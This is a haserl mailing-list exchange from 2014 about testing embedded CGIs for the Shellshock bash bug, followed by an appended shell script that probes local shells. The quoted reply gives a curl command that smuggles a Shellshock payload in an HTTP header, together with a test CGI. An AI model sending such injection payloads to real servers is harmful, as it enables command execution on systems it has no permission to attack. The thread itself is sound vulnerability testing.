Thanks for the detailed response: it was really helpful. We're using thttpd. My own testing shows that there are a lot of hoops for the attacker to jump through, and he's flying blind (no output), but there's likely enough attack surface area for someone who can play with one of our boxes to be able to break into another one.
Thanks,
Dan
At 2:59 PM -0400 9/27/14, Nathan Angelacos wrote:
>Daniel,
>
>If you are really using bash, then unfortunately you are vulnerable.
>
>To test, use curl to add a bogus header:
>
>curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned' http://example.com/haserl.cgi
>
>
>In my case, haserl.cgi is:
>
>#!/usr/bin/haserl --shell=/bin/bash
><%
>echo -e "Content-type: text/plain\r\n\r\n"
>
>env
>
>if [ -e /tmp/owned ]; then
> echo "vulnerable"
> rm /tmp/owned
>fi
>%>
>
>In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
>(lighttpd), but the /tmp/owned file was created - so that on subsequent
>requests (without the -H option) the last line of the cgi was "vulnerable".
>
>> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
>
>Debian and Ubuntu use "dash" as the /bin/sh shell. I think it's only
>user accounts that specifically get bash.
>
>Run 'ls -l /bin/sh'
>
>to see what your systems use. That's why I had to explicitly specify
>the shell in the cgi. When I use the default /bin/sh on ubuntu, the
>attack fails.
>
>_______________________________________________
>Haserl-users mailing list
>Has...@li...
>https://lists.sourceforge.net/lists/listinfo/haserl-users
--
Daniel T. Griscom gr...@su...
Suitable Systems http://www.suitable.com/
1 Centre Street, Suite 204 (781) 665-0053
Wakefield, MA 01880-2400
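An added host-side check, written for this thread and not code from Nathan, Dan or the haserl project: it follows Nathan's advice to look at what /bin/sh really is and probes whether the shell executes code following a function definition passed in through an environment variable, but uses an echo marker instead of touching a file in /tmp. It assumes `readlink -f` is available (GNU coreutils or busybox) and that the shells to check are passed as arguments.

```shell
#!/bin/sh
# Added example: check the shells a CGI may run under for the Shellshock
# behaviour (executing trailing code after an env-var function definition).
# Assumes `readlink -f`. Nothing is written to disk: the marker is an echo.

# Print what a shell path really is (follows the /bin/sh -> dash/bash symlink),
# i.e. the programmatic form of Nathan's `ls -l /bin/sh`.
resolve_shell() {
    readlink -f "${1:-/bin/sh}"
}

# Return 0 if SHELL executes the code that follows a function definition
# passed in an environment variable, 1 otherwise. A patched bash, dash,
# busybox ash and friends just run the -c command and return 1.
probe_env_function_import() {
    shell="${1:-/bin/sh}"
    out=$(env PROBE='() { :; }; echo IMPORTED' "$shell" -c 'echo probe-done' 2>/dev/null)
    case "$out" in
        *IMPORTED*) return 0 ;;
        *)          return 1 ;;
    esac
}

# One report line per shell, e.g. "/bin/sh -> /usr/bin/dash: not affected".
report_shell() {
    shell="${1:-/bin/sh}"
    target=$(resolve_shell "$shell")
    if probe_env_function_import "$shell"; then
        echo "$shell -> $target: EXECUTES env functions (vulnerable)"
    else
        echo "$shell -> $target: not affected"
    fi
}

# Check the default CGI shell plus any shells named on the command line
# (for instance the --shell=/bin/bash a haserl script may request).
main() {
    for s in /bin/sh "$@"; do
        [ -x "$s" ] && report_shell "$s"
    done
}

main "$@"
```

Run it on each box as `sh shellshock_check.sh /bin/bash`; any line reporting "EXECUTES env functions" means every haserl CGI using that shell is exposed to the header trick quoted above.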